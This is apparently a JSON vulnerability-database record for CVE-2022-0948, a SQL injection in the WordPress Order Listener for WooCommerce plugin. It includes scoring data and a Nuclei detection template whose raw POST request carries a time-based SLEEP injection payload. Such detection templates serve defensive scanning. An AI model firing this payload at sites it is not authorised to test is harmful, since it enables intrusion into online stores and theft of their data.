{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-0948/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-0948/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-0948/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-0948/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-0948/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-0948"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-0948"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.09879,
      "kev": false,
      "percentile": 0.95359
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-0948.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-0948\n\ninfo:\n  name: WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n  remediation: |\n    Update the WordPress Order Listener for WooCommerce plugin to version 3.2.2 or later.\n  reference:\n    - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576\n    - https://wordpress.org/plugins/woc-order-alert/\n    - https://plugins.trac.wordpress.org/changeset/2707223\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0948\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-0948\n    cwe-id: CWE-89\n    epss-score: 0.09879\n    epss-percentile: 0.95359\n    cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: pluginbazaar\n    product: order_listener_for_woocommerce\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        @timeout: 15s\n        POST /?rest_route=/olistener/new HTTP/1.1\n        Host: {{Hostname}}\n        content-type: application/json\n\n        {\"id\":\" (SLEEP(6))#\"}\n      - |\n        GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration_1>=6'\n          - 'status_code_1 == 200'\n          - 'contains(content_type_1, \"application/json\")'\n          - 'contains(body_2, \"olistener-action.olistener-controller\")'\n        condition: and\n# digest: 490a0046304402200cc24f76a7fbcab8bfec1d132487e52edff0c4c4a9f3437be6dfbf96b445679d02202cbfef9f97cb51e5045169004d49f0a21d514d35b4e7752baa109b88958808ce:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-0948"
}